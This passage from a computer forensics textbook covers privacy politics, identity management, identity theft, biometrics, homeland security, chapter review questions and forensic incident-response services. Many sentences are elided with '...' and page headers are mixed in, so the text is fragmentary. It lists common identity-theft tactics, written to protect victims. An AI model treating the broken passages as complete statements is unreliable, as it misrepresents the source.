large enterprises that started using the Internet for marketing, sales, or information
dissemination
...
The combination of these trends sets the
stage for potential privacy conflicts
...
The global nature of technology usage and thus international information exchanges, whether
they are voluntary, a result of technology architectures, or stem from out-and-out
deception, puts governments and international organizations in adversarial positions
...

Beyond the commercial use of the Internet, global competition has contributed
to a wave of industrial spying and the theft of trade secrets
...
The
Internet plays a role in this process by enabling people to move information around
the world faster and to provide low cost communications methods for information
theft rings
...

In the information-intensive environment of the 21st century, politics is of
course a factor
...
S
...
The Internet,
privacy, and consumer rights have historically been separate issues, but the dynamics of capitalism and cultural conflicts over privacy have fired rhetoric from
Washington, D
...
to San Francisco to Manila to Stockholm and around the world
...
These
issues also become content for the plethora of television news shows and pop culture news magazines
...
Politicians know
they must promise goodness, salvation, and protection of the family, community,

128

Computer Forensics, Second Edition

and country
...

In addition to their ineptness in the face of complex issues, politicians have a
fear of going against major trends
...
To be politically correct one must agree that this is a great revolution and that it is something
that will make economies stronger and the world a better place
...

The issue of protecting children and their privacy on the Internet has become a permanent part of the political process
...
According to industry analysts, by 2008 there will be over 130 million people under the age of 18
using the Internet
...

On the other hand, politicians prefer to avoid issues that are complex or that
require them to apply critical analysis to develop long-term solutions to major societal problems
...
This was painfully demonstrated by the
passage of the Communications Decency Act (CDA), which was rapidly ruled unconstitutional by the U
...
District Court
...
Another example of quickly shifting government positions is the
Federal Trade Commission (FTC) first being reluctant to push for greater privacy
protection and then in late spring of 2000 making an about face and taking the position that Congress should pass new legislation
...
For that reason,
having a comprehensive corporate privacy plan is of the utmost importance
...
This is important because organizations are becoming more dependent on information systems to manage critical financial data as well as customer records and product data
...

This author’s position on privacy is very straightforward
...


Types of Computer Forensics Systems

129

Also, this author’s view of privacy management is that it needs to be comprehensive and enterprise-wide
...
This includes but is not
limited to the IT department, legal counsel, customer relations, public relations,
product development, manufacturing, and the accounting or financial management department
...
In addition, the implementation and effectiveness of the privacy plan needs to be evaluated on an ongoing basis
...
This is done by giving you basic building blocks to understand the process
of developing, implementing, and monitoring privacy plans, policies, and procedures
...


IDENTITY MANAGEMENT SECURITY SYSTEMS
Identity management is the creation, management, and use of online, or digital, identities
...
Many such applications and interfaces require a unique user name, and as
a result, an individual typically possesses not one but several digital identities
...
An employee moving from one part of an organization to another—or being promoted to a higher management level—may
need to have updated access rights and other information attached to his or her digital identity
...
It is
not simply the ability to store or provision digital identities
...

Ultimately, identity management will help organizations do business and get
things done
...
Users will enjoy a
more convenient experience, and organizations will benefit from more efficient
processes and expanded business opportunities
...
Identity management will help organizations control access to enterprise systems and resources, facilitate efficient
and secure collaboration and commerce with business partners, and provide the
level of trust, convenience, and reliability needed to grow e-business revenues and
enhance profitability
...

The Challenges of Managing Digital Identities
The recent convergence of three events has created a sense of urgency around identity management
...

Aggregation

There is an incalculable amount of content on the Internet
...

In the process of providing more content and services, these aggregators have
developed relationships with users—including capturing their online identities
...
In an enterprise environment, this provides valuable tracking of information; for Web sites, each captured identity is an asset they can
leverage for their own—and their business partners’—marketing purposes
...
Examples of Web services currently prevalent on the Internet include calendaring, supply chain management, customer
relationship management, order fulfillment, sales force automation, music on
demand, and instant messaging
...
Consumers find Web services convenient and
cost-effective because they don’t need to go to a physical store and then purchase
and install software, and updates can be downloaded from the Internet
...

However, it is a significant challenge to verify a user’s identity and mitigate the
risk associated with providing high-value or sensitive services in an online businessto-business (B2B) or business-to-consumer (B2C) environment
...
A company can trust an employee’s identity more than that
of an external partner or customer because the company has more control over the
provisioning and maintenance of the employee’s identity
...

Online Partnerships

Many businesses are forging online partnerships with organizations that offer complementary services, both internally (to improve productivity) and externally (to expand their customer reach)
...
A B2C example would
be an airline that enables customers who have already logged in to its Web site to access hotel, rental car, and other services online
...

User Concerns and Business Issues
Beyond these three convergent events, there exist real concerns among the two audiences that would ultimately benefit from an identity management system: users
(employees, partners, and customers) and e-businesses
...
The challenges
that exist are making enterprise resources costly to manage and vulnerable to attack
and are impeding the growth of e-business because they create fear in consumers
and constrain the ability of businesses to operationalize their business models
...
Recently, industry analysts conducted a study
in which users were asked what they found most bothersome about the Internet
...
These
three issues are relevant to both consumer and business users, relate very strongly to
identity, and must be paramount in the design of any identity management system
...
S
...
The two most prevalent targets of
fraud were both Internet-based: online auctions and Internet service provider (ISPs)
...

Identity fraud (which will be discussed in detail later in the chapter) affects
users negatively in both home and work environments
...
On the enterprise side, if someone

132

Computer Forensics, Second Edition

uses another identity to obtain and release proprietary information, that usage
could be tracked and the innocent employee could be blamed—and probably
fired—for something he or she didn’t do
...

Convenience

The point of security systems is to make it extremely inconvenient for unauthorized
users to gain access
...

Mindful that consumer and business users want convenience, many Web
browsers support password caching
...
Of course,
this means that anyone who sits down at that person’s computer can log on and illegally use an already authorized identity
...
If a single,
shared online identity that eliminates the need for multiple registrations and passwords represents convenience in an identity management system, then that system
must add strong security via authentication technologies (such as digital certificatebased smart cards, tokens, and biometrics) as well as fine-grained authorization
through access management technologies
...

Privacy

A key benefit of an identity management system is that a single user identity can be used
across multiple Web sites and electronic resources
...
For one thing, it would be possible for someone to
track which Web sites, applications, or databases a user had accessed, which could be interpreted as a violation of privacy
...

Any identity management system must adequately protect sensitive user information and adhere to the four key elements of a privacy policy:
Notice: Users receive prior notification of information practices
...

Access: Users have the ability to access their personal information
...

Business Issues: Trust, Control, and Accountability
In addition to these user concerns, there are three primary business issues that
must be addressed by an identity management system: trust, control, and accountability
...

Trust via Authentication

Consider an employee collaboratively developing a product in a virtual environment with a business partner
...
An identity management solution would enable the user to access these
varied distributed resources with single sign-on convenience—but the system falls
apart if the business partner can’t trust the authentication process the original company used to approve its employee’s credential
...

Control via Access Management

Assuming the employee’s digital identity is trusted, policies should be applied to
control access to protected resources
...
Enforcement, then, ensures the effectiveness of online business processes
...
The employer and the business partner need to share this information to hold all parties accountable for the integrity of the system and the success of their partnership
...
Also, companies have been advised to perform their own vetting and authentication on customers and not rely on someone else’s prior approval
...


134

Computer Forensics, Second Edition

Approaches to Identity Management
To date, there have been three distinct approaches to developing an identity management system, each appropriate to different circumstances and requirements
...
As presented, they represent a conceptual and technological evolution from one-on-one and closed systems to more universal approaches that
seek to address the wide range of issues that have been discussed thus far
...

Silo

In a silo model, each business creates a unique relationship with its customers, employees, and partners through Internet, intranet, and extranet sites, respectively
...

The silo approach also has some significant drawbacks
...
For businesses, the silo model inhibits cross-selling opportunities; it is also expensive to
maintain—and burdensome to administer—multiple silos
...
An example would be any group of
companies, government agencies, or educational institutions that have banded together to serve a common user group or to establish an online B2B exchange
...

If a user wants to visit the Web site of a company outside the closed community—say, a competitor of one of the members—he or she would have to go to that
site separately
...
The disadvantages are
that users have a limited choice of companies to deal with and would be inconvenienced if they needed to belong to multiple communities or leave a community because a preferred vendor is not a member
...


Types of Computer Forensics Systems

135

Federated

In a federated model, each partner agrees to trust user identities issued or authenticated by other organizations while maintaining control of the identity and preference information of its own users
...

The federated model promises consolidated authentication capabilities across
distributed computing resources
...
For businesses, benefits include
greater efficiency and security; better services for employees, partners, and customers;
and new revenue opportunities
...

Overall, it appears that the federated model is emerging as the preferred next
step both for silo organizations looking to expand their reach and for closed communities seeking to connect with other communities on the Internet
...

An identity management solution is about intelligently using the identities that
have been created to do e-business
...
The vision
of identity management, therefore, incorporates a broader definition, a technologyneutral approach to integration and a flexible architecture that enables interoperability with multiple identity systems inside and outside organizations
...

User provisioning: Deploying digital identities and access rights based on business policies for employees, business partners, and customers must be done accurately and securely at the outset in order to reduce problems down the line
...

Authentication policy management: Once someone steals a user’s digital identity, the whole system becomes vulnerable
...


136

Computer Forensics, Second Edition

Authorization policy management: Authorization policies are designed to ensure that only appropriate resources can be accessed by a given digital identity
...

Centralized audit: Organizations need to track what users are doing and make
sure there are no blatant inconsistencies that indicate a problem
...

Integration: Putting the individual pieces together in a technology-neutral architecture enables sharing, ensures interoperability, and facilitates single signon capabilities
...
A single federated identity enables a user to be authenticated from all
other partners in the model
...
Further, they need to manage and control authorized identities to ensure they are current and are being used in accordance with established policies
...
The challenges that have brought the issue of identity management to the fore will only grow and exacerbate the problems that have
stunted the growth of e-business and contributed to information security breaches
around the world
...
A federated approach will bring substantial benefits to users
and businesses alike
...


IDENTITY THEFT
Quite simply, identity theft is the appropriation of an individual’s personal information in order to impersonate that person in a legal sense
...

Identity theft is not new
...
There was a time
when an individual could flee his or her life, town, and mistakes and go somewhere
far away pretending to be someone else—and, no one knew better
...
Those were the days before
credit reporting and high-tech methods of tracking and sharing information were
commonplace
...
However it is done,
whether the identity thief uses high- or low-tech means of getting your personal information, an individual can become someone else very easily
...
An individual’s life can be devastated by the loss of good name
and the financial or personal mess that results
...
Thieves could be roommates, relatives, friends, estranged spouses,
or household workers—with ready access to their victims’ personal papers
...
The thief’s
motive is to gain goods and services at someone else’s expense
...
Who
is going to apprehend him? Occasionally law enforcement agencies, including the Secret Service, bust up identity theft crime rings that involve many victims and millions
of dollars, but they don’t chase down single crooks that commit victimless crimes
...
This could be individual hackers out to get
what they can or highly sophisticated crime rings that make a business out of fraud
...
You may do any of a hundred
little things each of us does every day that involve someone knowing who we are
...
Those who make a profession of stealing identities give it a great
deal of thought, indeed
...
The following are some of the ways imposters can get and use your personal information and take over your identity:
They steal wallets and purses containing your identification and credit and
bank cards
...

They complete a change of address form to divert your mail to another location
...


Types of Computer Forensics Systems

139

They fraudulently obtain your credit report by posing as a landlord, employer,
or someone else who may have a legitimate need for (and a legal right to) the
information
...

They find personal information in your home
...

They buy your personal information from “inside” sources
...

They call your credit card issuer and, pretending to be you, ask to change the
mailing address on your credit card account
...
Because your bills are being sent to the new address,
it may take some time before you realize there’s a problem
...
When they use the credit card and don’t pay the bills, the
delinquent account is reported on your credit report
...

They open a bank account in your name and write bad checks on that account
...

They counterfeit checks or debit cards and drain your bank account
...


How Your Personal Information Can Be Used Against You
Once the thief has basic information about you, there are a number of ways it can be
used
...
It is
then a simple matter to call the financial institution and request a change of mailing
address
...
You don’t realize what’s
happening for a while because you haven’t gotten a bill
...

An identity thief who has enough information about you can open a new credit
card account in your name
...
The balance on your new account by
that time could be devastating—not to mention that the late payments have been
reported to the credit bureau
...
Huge long distance and service bills can be

140

Computer Forensics, Second Edition

charged to you because now the identity thief is getting the bill—not you
...
The end result is the same as with
a phony credit card—you are left with a monstrous bill and your delinquency is reported to the credit bureau
...
In other words, an identity thief can
hurt you by opening a bank account in your name, possibly with a cash advance
from your bogus credit card, and then write bad checks against that account as
often as possible before the bank reports your felonious conduct
...
If the thief is good enough, he or she
gets the goods and you get the bill
...
This would prevent the thief from having to pay debts incurred in your
name
...
Never forget the thief who has a personal agenda to
cause you harm—what could be better than bankruptcy?
These are just some of the ways that the theft of your identity can wreak havoc
in your life, and thinking about them is enough to scare the daylights out of you
...

Once the thieves have some of your personal information, they can start applying for credit cards in your name—giving an address that is often different from
yours
...
A lot
of credit granters do not check records
...

Identity thieves may buy a car or rent an apartment in your name
...
For example, in one case, the impostor was a
major drug dealer using the identity of a highly ranked corporate executive
...
Still, cops recently broke into the man’s house and into his
bedroom with guns drawn
...

Some have had their telephone service disconnected and their driver’s licenses suspended or been harassed by collection agencies
...
Although the FTC does not have the authority to bring criminal cases, they
can help victims of identity theft by providing information to assist them in resolving

Types of Computer Forensics Systems

141

the financial and other problems that can result from this crime
...

If you’ve been a victim of identity theft, file a complaint with the FTC by contacting their Identity Theft Hotline by telephone: toll-free 1-877-IDTHEFT (4384338); TDD: 202-326-2502; by mail: Identity Theft Clearinghouse, Federal Trade
Commission, 600 Pennsylvania Avenue, NW, Washington, DC 20580; or online:
http://www
...
gov/idtheft
...
If
specific institutions and companies are not responsive to your questions and complaints, you also may want to contact the government agencies with jurisdiction
over those companies
...
In 1998, when Congress made identity theft a federal crime,
it directed the FTC to establish a clearinghouse for identity-theft complaints and assistance
...
The Secret Service, for example, says
victims and institutions in its identity-fraud investigations lost $4
...
78 billion in 2000
...
Consumers don’t have to call the FTC and
the Secret Service and the FBI
...
Therefore, it is expected that there will be a significant increase in the
number of federal prosecutions
...
That leaves many cases in the
hands of local police
...

All the police can do in most instances is file a police report, but that still helps
...
Although there are many variations in how specific products and systems work, there
are a number of common processing elements
...
One essential difference between the various techniques is the characteristic (body part or
function) being analyzed
...
All
biometric systems have some sort of collection mechanism
...

In order to “enroll” in a system, an individual presents his “live” biometric a
number of times so the system can build a composition or profile of his characteristic, allowing for slight variations (different degrees of pressure when he places his
finger on the reader)
...

Extraction
Commercially available biometric devices generally do not record full images of
biometrics the way law enforcement agencies collect actual fingerprints
...
” Only certain attributes are collected (particular measurements of a fingerprint or pressure points of a signature)
...

This extracted information, sometimes called “raw data,” is converted into a
mathematical code
...
This code is then stored as a “sample” or “template
...
Regardless of the variations, all biometric systems must create and retain a
template of the biometric in order to recognize or verify the individual
...

Comparison and Matching
To use a biometric system, the specific features of a person’s biometric characteristic are measured and captured each time he presents his “live” biometric
...
The new code created from the live scan is compared
against a central database of templates in the case of a one-to-many match, or to a
single stored template in the case of a one-to-one match
...


Types of Computer Forensics Systems

143

HOMELAND SECURITY SYSTEMS
Since 2000, terms such as “homeland security” and “homeland defense” have been
widely used to describe America’s response to the information warfare (IW) waged
by terrorists (IW will be discussed in greater detail in Chapters 13 through 19)
...

Homeland Security Defined
The terms homeland security and homeland defense have received increased attention since the tragic events of September 11, 2001
...
Homeland security is defined as the deterrence, prevention, and preemption of and defense against aggression targeted at
U
...
territory, sovereignty, population, and infrastructure as well as the management of the consequences of such aggression and other domestic emergencies
...
It is defined
as the deterrence, prevention, and preemption of and defense against direct attacks
aimed at U
...
territory, population, and infrastructure
...
S
...
Nevertheless, the homeland security space is still being defined
...

Homeland Security Today
In November 2002, President Bush signed the Homeland Security Act of 2002, creating the Department of Homeland Security
...
S
...

This is the most significant transformation of the U
...
government in over a
half century
...
The Department of Homeland
Security has the following organizational structure:
Border and transportation security
Emergency preparedness and response
Chemical, biological, radiological, and nuclear countermeasures
Information analysis and infrastructure protection

144

Computer Forensics, Second Edition

Emergency mangers had been pleased with Bush’s previous attention to emergency management
...
Now, emergency managers are concerned, as FEMA has been
swallowed up in a new organization with a broader mission
...

The first line of homeland defense in any emergency is the “first responders”—
local police, firefighters, and emergency medical professionals
...
Emergency management and health care capabilities are a critical second tier
to the first responders
...
S
...
Homeland security initiatives will likely focus on improving our capability to respond to a terrorist attack
...
This is the part of homeland security
where first responders and emergency mangers play a vital role
...
Emergency managers have been providing homeland security and
homeland defense services for decades
...
Today, comprehensive emergency management, homeland security, and terrorism preparedness are included in
an all-hazards comprehensive emergency management program (CEMP)
...

How Comprehensive Emergency Management Addresses Homeland Security
Finally, a CEMP is an overarching process that includes mitigation, preparedness,
response, and recovery
...

Sound emergency management practices are required to mitigate the impact of
day-to-day disruptions as well as managing response to and recovery from terrorist attacks and other disasters
...
These expectations are being made against a backdrop of external threats
that have grown in both number and sophistication, internal threats that could involve terrorist and organized crime, and a rapid growth in the number and type of
threat data sources
...
The latter also creates challenges within an organization’s personnel structure since an integrated security system now requires IT
and non-IT data inputs that extend far beyond the traditional scope of IT
...
At the same time,
most enterprises are facing a difficult economic environment with infrastructure
capital and operating costs allowing minimal (if any) increases in expenditure
...
Just as enterprise resource planning (ERP) systems
provide enterprise management with financial reporting metrics that are increasingly “real-time,” there is a demand that security systems quickly deliver relevant
information to enable a speedy reaction to a broad range of threats
...
It typically involved a small number of devices and log files
...
” In parallel, the September
11 terrorist attack on New York’s World Trade Center led to growing demands for
improved correlation between widely disparate data sources
...
S
...
Implementation of sophisticated capture and computer forensics analysis systems is
already underway to meet the goals of the homeland security strategy
...
The traditional distinctions between incident
response and forensic tools are blurring because of the growing expectations put
upon security tools
...
Thus, this chapter analyzed how computer forensics
technologies can be extended to address the future requirements of IT security and
computer forensics systems
...
The following conclusions are not exhaustive, nor
is the order significant
...

Intrusion detection systems help computer systems prepare for and deal with
attacks
...


Types of Computer Forensics Systems

147

Storage area network security systems offer the most promising solutions for
secure storage problems today, complementing the other solutions of direct
storage, centralized storage, and network-attached storage
...

PKI security systems assume the use of public key cryptography, which is the
most common method on the Internet for authentication of a message sender
or encryption of a message
...

Governments and organizations around the world can use satellite encryption
security systems to help preserve vital national secrets, limit attacks on a nation’s information infrastructure, and eliminate security and authentication
obstacles to electronic commerce
...

All types of organizations need to develop net privacy policies that maximize
the benefit of reusing information in as many ways as possible while minimizing the risks associated with potential privacy violations
...

In today’s environment, it is next to impossible to stop a determined identity thief
...

Homeland security systems encompass policies, actions, and structures designed to protect the rights and freedoms inherent in the U
...
Constitution
...


An Agenda for Action
When completing the Forensics Systems Types Checklist (Table F3
...
The order is not significant; however, these are the activities for which the researcher would want to
provide a detailed description of procedures, review, and assessment for ease of use

148

Computer Forensics, Second Edition

and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions/exercises, hands-on projects, case projects, and optional team case project
...


CHAPTER REVIEW QUESTIONS AND EXERCISES

True/False
1
...

2
...

3
...

4
...

5
...

Multiple Choice
1
...
High-level management policy statement
B
...
Examination of risks
D
...
Developing an implementation strategy
2
...
Stored value card: minimizes the need to carry cash, can be used to purchase items from merchants, vending machines, and pay phones

Types of Computer Forensics Systems

149

B
...
Access control in offices and hotels: allows storage of time entered and exited, access conditions, and identity
D
...
Contact tickets for ski resorts and airlines: increases speed, convenience,
and security and facilitates baggage checking
3
...
Monitoring and analysis of user and system activity
B
...
Auditing of system configurations and vulnerabilities
D
...
Recognition of activity patterns reflecting known attacks
4
...
This
is a valuable function and would be sufficient protection were it not for the following facts, except two:
A
...

B
...

C
...

D
...

E
...

5
...
Many of these attacks are directed through the
Internet
...
Persons who see attacking a corporation’s information system as a technological challenge
B
...
Persons who investigate to avoid the possibility of incurring legal action
against themselves or the organization for whom they are reviewing the investigation
D
...
Persons associated with a corporate competitor or political adversary who
see the corporation’s information system as a legitimate strategic target

150

Computer Forensics, Second Edition

Exercise
Larry deposits a stolen third-party check into his account
...
Subsequently an ATM camera records Larry making a cash withdrawal
...
How would your forensic system continue to handle this analysis?

HANDS-ON PROJECTS
At 9:36 A
...
William swipes his access card to level 20 and enters the secure staff
area
...
The system checks the company calendar and detects that Bill,
a member of the organization’s merger and acquisition unit, is scheduled for an offsite training course and is not expected in the building at all that day
...
M
...
M
...

The system review of related video log files confirms the same unidentified person
leaving level 20 at 9:54 A
...
and leaving level 36 at 10:50 A
...
At this point, how
would the company’s computer forensics team go about investigating this case?
Case Project
Karin enters a bank branch in the Chicago area and deposits a check for her
brother
...
The image is time and date
stamped
...
During a routine correlation of data, the
apparent discrepancy is detected by the bank’s forensics system
...
Please explain your solution in detail regarding the
organization’s computer forensic technology team’s investigation into this matter
...

[2] “Online Payment Processing: What You Need to Know,” © 2003 VeriSign,
Inc
...
VeriSign Worldwide Headquarters, 487 East Middlefield Road, Mountain View, CA 94043, 2003
...


This page intentionally left blank

4

Vendor and Computer
Forensics Services

yber crime costs U
...
businesses millions, if not billions, of dollars in unrealized profits and exposes organizations to significant risk
...
In 2003, the Computer Emergency Response Team (CERT) reported a
sevenfold increase in the number of computer security incidents reported in 2002
...
When cyber crime strikes, the issue is not the incident itself, but how the organization responds to the attack
...
In addition, this chapter covers the following computer forensic services:

C

Forensic incident response
Evidence collection
Forensic analysis
Expert witness
Forensic litigation and insurance claims support
Training
Forensic process improvement

153

154

Computer Forensics, Second Edition

OCCURRENCE OF CYBER CRIME
Cyber crime occurs when information technology is used to commit or conceal an
offense
...
Typically,
the largest threat to organizations has been employees and insiders, which is why
computer crime is often referred to as an insider crime
...

Internal events are committed by those with a substantial link to the intended
victim, for example, a bank employee who siphons electronic funds from a customer’s account
...

However, as advances continue to be made in remote networks, the threat from
external sources is on the rise
...

An external event is committed anonymously
...
Other types of external cyber
crime include computer system intrusion, fraud, and reckless or indiscriminate deliberate system crashes
...

However, when the person involved has used intimate knowledge of the information
technology infrastructure, obtaining digital evidence of the offense can be difficult
...
Typically, the offender has

Vendor and Computer Forensics Services

155

no motive and is not even connected with the organization, making it fairly
straightforward to prove unlawful access to data or systems
...
Forensic investigators detect the extent of a security breach,
recover lost data, determine how an intruder got past security mechanisms, and,
possibly, identify the culprit
...
They should also
be knowledgeable in the law, particularly legal jurisdictions, court requirements,
and the laws on admissible evidence and production
...
The alternative is pursuing civil remedies, for instance, pursuing breach of
trust and loss of intellectual property rights
...
Notwithstanding the
technical expertise of information technology (IT) teams, most companies are illequipped to investigate cyber crime in a way that results in the collection of admissible evidence
...
In other words, it must meet the requirements of the jurisdiction’s laws of evidence
...
As a result, law enforcement organizations and computer forensic experts
are often forced to use archaic and nonspecific laws to fit unusual circumstances
...
However, if a disgruntled employee copied an organization’s database
and sold it to a rival company, the organization is not permanently deprived of the
data; therefore, technically, no offense of theft has been committed
...
However, even in
cases where there is a clearly defined crime, corporations are often hesitant to pursue a criminal conviction because of the time, cost, and reputation risk involved in
reaching a legal outcome
...
With legislation lagging behind technology, businesses have had no choice but to absorb the responsibility for
the security of their most valuable asset—their information
...

The best approach for organizations wanting to counter cyber crime is to apply
risk-management techniques
...

Effective IT and Staff Policies
Well-communicated and “plain English” IT policies educate staff about their rights
and obligations in the workplace
...
To be effective,
IT policies should make plain what an individual employee can and cannot do on
the organization’s systems and the legal implications of misuse
...

Effective policies diminish the risk of internal attack, particularly unintentional
attack
...

Vendor Tools of the Trade
Although internal policies will not dissuade external cyber criminals, the right vendor tools will detect an external attack and alert the organization to the threat
...

Choosing the right cyber crime detection tools is essential for risk management
in all organizations, but like most applications associated with an organization, the

Vendor and Computer Forensics Services

157

question is, what is the right tool? The right tools are those that deliver appropriate
information that the forensic expert can interpret to achieve the best outcome
...
To deliver the
information needed, software tools should be probing (without compromising the
target of interrogation), concise, able to report findings fully, supported, and easy
to use
...

The 2003 CSI/FBI Computer Crime and Security Survey shows a significant increase in companies using intrusion detection systems, from 58% in 2001 to 79%
in 2003 [2]
...

As with all of today’s technology, detection tools date quickly as new threats
emerge
...
Some online products and services currently on the market provide efficient, cost-effective solutions by accessing
computer vulnerabilities specific to an organization’s IT environment
...
However, the attack itself does not have the greatest impact on a company
...
Without the appropriate procedures in place to counter detected attacks, an organization is exposed
to the risks of lost data, financial loss, network damage, and loss of reputation
...
For example, the simple process of ensuring that the
right people know about the incident when it happens enhances an organization’s
response, both in time and effective handling procedures
...
By appointing a forensic expert to manage the response to an incident,
organizations ensure all avenues are canvassed, all evidence located and handled
correctly, and all those involved treated impartially (see sidebar, “Computer Forensic Incident Response Procedures [CFIRP]”)
...
M
...

The only people on the mailing list who are up and awake and reading their mail are
the operations staff, but they know that sometimes in the wee hours, one of the more
nocturnal network staff come in
...
To their
delight, he is in his office, so they forward him the security email and consider their
part of this incident finished
...
He then sends an email to security stating that the hosts are blocked and considers his part in this incident finished
...
The entire team
assumes that the nocturnal network person notified the owner of the machines of
the problem and that action has been taken
...


O UTCOME
The two servers that were blocked were two major servers for the math department
...
The math department has their own system administrators, who were not on the security mailing list
...
No one informed the owners of the alleged compromised hosts of the
network block of the alleged compromise until the problem was elevated to the
director of networking and the chair of the math department
...
You should start with an
outline of the key elements of a successful CFIRP but also include forms that can be
used to identify the incident contact personnel as well as forms for incident handling, containment, and eradication
...
There may be times when local law enforcement will pay you a visit
...
Knowing someone in your local computer crimes lab is a good idea
...

The FBI has developed a collaborative effort, named InfraGard
...

It is also critical to have someone assigned to notify and report incidences to
CERT
...

Last but certainly not least, let’s not forget that an ounce of prevention is worth
a pound of cure
...
It’s been proven time and time again that most security
problems originate from inside organizations
...
When developing your policy, a lot will depend on the type of
organization
...

If you don’t think you need a CFIRP policy, try the following exercise: Do a
mock incident (with the permission of your management), but don’t let your security people know it is an exercise
...
You
will need to take into consideration all the nuances of your site and get support and
buy-in from upper management
...


In other words, deterrence is the appropriate forensic response and the fundamental element of a defensive strategy for the organization
...
This is the essence of the three key
causal variables of general deterrence theory: certainty, severity, and celerity
...
Thus, while deterrence is recognized as a highly effective defensive strategy, its applicability to defense against attacks on our nation’s information infrastructures is not clear,
mainly because of our inability to link attackers with attacks
...
As with the “weak link” and “picket fence” analogies, if
any one of these steps is missing or ineffective, the ability to achieve the desired result is compromised
...
Any response is
generally limited to logging, reporting, and isolating or reconfiguring
...
While defensive techniques are important, it’s critical not to “stovepipe” in
such a way that you can’t effectively link with the offensive component of an overall strategic cyber defense
...
Such a capability is critical if your cyber defenses are to transcend a merely reactive posture to one in which both offensive and
defensive techniques can be effectively applied in tandem
...
Forensics
response capabilities could help provide the bridge between the defensive and offensive elements of an overall cyber defense strategy
...
Otherwise, attackers can act with impunity, feeling confident that they
need not fear the consequences of their actions
...
Although forensic response
techniques are highly developed for investigations in the physical realm and are
being developed for application to computer crime, what is needed is an analogous
capability for real-time, distributed, network-based forensic response analysis in the
cyber realm
...
Critical supporting technologies include those needed for
correlation and fusion of evidence data, as well as automated damage assessment
...
Cyber attacks against the U
...
and its allies may not have the obvious visual cues and physical impact typically associated with attacks in the physical realm
...
Depending on the situation, it may be
necessary to have irrefutable proof of the source of the attack, the kind of proof typically developed through forensic response methods
...
Use of such a capability implies the need for laws specifying authorization to conduct cyberspace
pursuits and cooperative agreements with foreign governments and organizations
...

Extending the aircraft analogy, the need for effective identification during cyberspace pursuits, and for coordinating offensive IW response actions through intermediary “friendly” networks, may necessitate a type of “network identification
friend or foe (IFF)” capability, just as the introduction of fast-moving aircraft in the
physical realm necessitated the need for secure IFF
...

One issue of concern at the strategic level of IW is the distinction between the
military and private sector information infrastructures
...
The approach suggested in this section may be applicable regardless of
whether the networks attacked belong to the military
...
From
an organizational perspective, efforts are underway to develop the necessary coordination structures, such as the National Infrastructure Protection Center, between
the private and commercial sectors
...

Another fundamental concern this approach may help address is the problem
of malicious insiders
...
Attacks initiated from
within the enclave, possibly even by a trusted insider, have traditionally been much

162

Computer Forensics, Second Edition

harder to defend against
...
These systems simply check
whether a user is acting within the prescribed privileges while remaining in complete oblivion regarding the abuse of these privileges
...
The need for timely and unequivocal
identification of attackers is essential for such an approach to be effective
...
In addition, there may be some
complicating factors for the implementation of the type of identification and forensics response capability discussed here, such as the widespread move to encryption
...


COMPUTER FORENSICS INVESTIGATIVE SERVICES
There are without doubt some very knowledgeable experts in the field of computer
forensics investigations; however, there has been an increase in the number of people purporting to be experts or specialists who produce flawed opinions or take actions that are just plain wrong
...
Most investigations are basically the same in that
they are either proving or disproving whether certain actions have taken place
...

In many companies, forensic computer examiners are kings because they have
more knowledge of the subject than their peers
...

Time restrictions can cause them to take short cuts that invalidate the very evidence
they are trying to gather, and when they do not find the evidence that people are demanding (even if it isn’t there), they are subject to criticism and undue pressure
...
The specialists’ management does not understand what they are doing (and probably don’t
want to admit it), and often they are faced with the question, Can’t you just say
this
...

This sort of pressure comes not only from within the organizations, but also
from external sources
...

Working in isolation is a major problem; apart from talking to yourself (first sign
of madness), many people have no one else to review their ideas and opinions
...

Computer Intrusion Detection Services
Installing technical safeguards to spot network intruders or detect denial-of-service
attacks at e-commerce servers is prudent, but if your staff doesn’t have the time or
skills to install and monitor intrusion detection software, you might consider outsourcing the job
...
Although outsourcing security means divulging sensitive information about your
network and corporate business practices, some companies say they have little
choice but to get outside help, given the difficulty of hiring security experts [6]
...
5 billion in 2003
...
4
billion, fueled by the trend toward outsourcing internal local area network (LAN)
security to professional security firms as virtual employees
...
The
digital evidence collection process not only allows you to locate that key evidence,
but also maintains the integrity and reliability of that evidence
...
Any delay or continued use of
the suspect computer may overwrite data prior to the forensic analysis and result in
destruction of critical evidence (see sidebar, “Evidence Capture”)
...
This could result
in destruction of evidence
...
)
Removable storage devices (zips, Jaz, Orb, floppy diskettes, CDs, Sony Memory Sticks, Smart Media, Compact Flash, LS-120, optical disks, SyQuest,
Bernouli, microdrives, pocketdrives, USB disks, firewire disks, PCMICA)
Network storage devices (redundant array of independent [or inexpensive]
disks [RAIDs], servers, storage area networks [SANs], network attached
storage [NAS], spanned, remote network hard drives, back-up tapes, etc
...

Secure all removable media
...

Disconnect the computers from the network
...


EVIDENCE CAPTURE
One of the fundamental principles of computer investigation is the need to follow
established and tested procedures meticulously and methodically throughout the
investigation
...
Reproducibility of evidence is the key
...

Another frequent problem with capturing evidence is lack of experience—not
only lack of site experience but also inappropriate experience of the type of systems
that might be encountered
...
It is essential that a sympathetic working environment is created such
that peer pressure or fear of loss of status and respect does not override the need to
call for help
...

Finally, sloppiness, time pressure, pressure applied on-site, fatigue, or carelessness
have all been contributory factors in transforming solid computer evidence into a dubious collection of files
...

They are issues for which there is no sympathy
...

Ultimately, any time the collection of computer evidence is called into question, it
is potentially damaging to everyone who is a computer forensic practitioner; it is ultimately in everyone’s best interest to ensure that the highest standards are maintained
...
This type of computer forensics service is used by countless organizations (banks, insurance companies, law firms, local governments, retailers,
technology firms, educational institutions, charitable organizations, manufacturers, distributors, etc
...
Corporations and government agencies are racing
to provide Internet access to their employees
...
Paramount is loss of productivity; workers can easily spend
countless hours online entertaining and amusing themselves at their employer’s expense
...

Although protecting your organization from outside threats is clearly important, protecting the organization from internal threats is at least as important, if
not more so
...
A quarter reported
theft of proprietary information, and 80% reported theft of laptop computers
...
According to Sextracker, an organization that tracks the online
pornography trade, 82% of online pornography viewing occurs during the 9–5
work day [2]
...
The content should be based on your corporation’s experience in employment-related investigations, computer crime investigations, civil litigation, and criminal prosecutions
...
The discussions should include topics such as why policies are needed,
potential liability, employee productivity considerations, and civil litigation
...
The
policies should directly address the problems that you would typically find in organizations of all sizes
...
As the risk increases, so will the interest in policies and the cost of
premiums and litigation
...
The concept
of insuring digital assets has been slow in catching on because the risks and damages were hard to quantify and put a price tag on
...
At the same time, it has become
harder to find underwriters willing to insure multimillion-dollar cyberspace policies
...
Prior
to September 11, 2001, the focus of information security was on critical infrastructure
...

